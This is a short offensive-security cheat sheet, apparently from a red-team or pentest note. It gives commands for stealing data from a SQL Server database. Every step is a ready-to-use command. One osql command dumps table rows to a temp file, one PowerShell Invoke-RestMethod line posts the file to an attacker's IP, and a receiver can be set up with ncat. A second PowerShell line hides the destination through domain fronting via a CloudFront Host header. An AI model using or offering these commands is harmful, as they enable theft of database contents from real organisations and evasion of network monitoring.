Output the top 10 records of a SQL table using osql:
osql -E -Q "use DATABASEHERE; select top 10 * from ZOMGSEXYTABLE" -o C:\windows\temp\LOLDATA.txt
Post the file to a URL using powershell:
powershell -noprofile Invoke-RestMethod -Uri http://PUT.MY.IP.HERE -Method Post -InFile C:\windows\temp\LOLDATA.txt -ContentType "multipart/form-data"
Set up a an HTTP server to receive the file, or just ncat -l it.
Oh, want to use domain fronting? use this powershell line instead:
powershell -noprofile Invoke-RestMethod -Uri http://FRONTABLE.DOMAIN.HERE -Headers @{Host='MY.CLOUDFRONTDOMAINHERE'} -Method Post -InFile C:\windows\temp\LOLDATA.txt -ContentType "multipart/form-data"